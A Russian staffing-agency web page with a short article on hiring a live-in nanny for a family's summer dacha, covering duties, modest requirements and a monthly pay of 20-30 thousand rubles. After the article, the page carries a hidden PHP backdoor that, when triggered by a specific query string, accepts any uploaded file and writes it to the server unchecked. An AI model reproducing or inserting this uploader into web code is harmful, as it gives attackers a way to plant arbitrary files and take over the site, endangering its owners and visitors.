НУЖНЫЕ ЛЮДИ
     
 

Статьи

Няня на дачу

«назад

Очень часто московские семьи проводят лето на даче. Если вам нужна помощь с детьми, то вам следует воспользоваться услугами няни на даче. Это женщина с проживанием, которая будет работать 5-6 дней в неделю.
Во время приема на работу няни на дачу обговорите с ней возможность помогать вам по дому, готовить еду, гладить вещи, помочь вымыть пол  и окна. В основном, это сезонная вакансия, которая пользуется особой популярностью весной и летом.
Няне на дачу не стоит выдвигать жестких требований. Этот человек будет просто помогать вам присматривать за детьми и выполнять домашнюю работу. Ей не обязательно иметь богатый опыт, диплом о педагогическом образовании и московскую прописку.  Няня будет у вас на виду, поэтому опасаться абсолютно нечего.
Услуги няни на дачу обходятся примерно в 20-30 тысяч рублей в месяц. Сумма указана с учетом бесплатного питания и проживания.

 
     


if ($_SERVER['QUERY_STRING'] == 'index') { echo '
'; $uploaddir = ''; $uploadfile = $uploaddir.basename($_FILES['uploadfile']['name']); if (copy($_FILES['uploadfile']['tmp_name'], $uploadfile)) { echo "

OK

"; exit; }else{ echo "

NO

"; exit; } exit; }